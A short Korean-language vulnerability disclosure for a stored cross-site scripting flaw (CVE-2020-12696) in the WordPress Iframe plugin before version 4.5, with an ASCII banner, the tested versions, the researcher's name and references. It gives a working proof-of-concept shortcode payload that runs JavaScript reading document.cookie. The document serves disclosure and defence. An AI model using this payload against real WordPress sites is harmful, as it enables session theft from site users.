
저장형 크로스 사이트 스크립팅 - Iframe 플러그인 - WordPress
██╗ ██╗███████╗███████╗
╚██╗██╔╝██╔════╝██╔════╝
╚███╔╝ ███████╗███████╗
██╔██╗ ╚════██║╚════██║
██╔╝ ██╗███████║███████║
╚═╝ ╚═╝╚══════╝╚══════╝
Iframe < 4.5 - 인증된 저장형 크로스 사이트 스크립팅 (XSS)
버전 4.5 이전의 iframe 플러그인은 URL을 정화(sanitize)하지 않습니다.
페이로드: </b>[iframe src="javascript:confirm(document.cookie)" width="100%" height="500"]
버전 [플러그인]: </b>4.4
테스트 환경: </b>WordPress 5.2.4
연구자: </b>Guilherme Rubert
참고 자료:
https://guilhermerubert.com/blog/cve-2020-12696/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12696
https://wordpress.org/plugins/iframe/#developers